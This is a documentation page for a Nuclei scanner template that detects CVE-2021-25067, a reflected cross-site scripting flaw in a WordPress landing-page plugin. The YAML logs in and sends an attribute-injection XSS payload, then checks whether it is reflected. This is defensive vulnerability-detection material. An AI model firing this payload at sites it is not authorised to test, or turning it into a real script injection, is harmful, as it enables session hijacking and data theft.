Skip to content
Nuclei Templates

Landing Page Builder < 1.4.9.6 - Cross-Site Scripting

ID: CVE-2021-25067

Severity: medium

Author: theamanrawat

Tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops

Description

Section titled “Description”

The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.

YAML Source

Section titled “YAML Source”
id: CVE-2021-25067


info:
  name: Landing Page Builder < 1.4.9.6 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: Fixed in version 1.4.9.6.
  reference:
    - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc
    - https://wordpress.org/plugins/page-builder-add/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25067
    - https://github.com/kazet/wpgarlic
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-25067
    cwe-id: CWE-79
    epss-score: 0.00069
    epss-percentile: 0.29862
    cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pluginops
    product: landing_page
    framework: wordpress
  tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")'
          - 'contains(body_2, "Enter Page Title")'
        condition: and
# digest: 490a00463044022073d355cba7636804f5fb8e818caee0b5408ac9896f8d4658e4e92d9fa7bc6f3202203f6738077fbd3e251d99fd44c5a410e4b43e4229f9c4940cd0e8235888569aae:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25067.yaml"

View on Github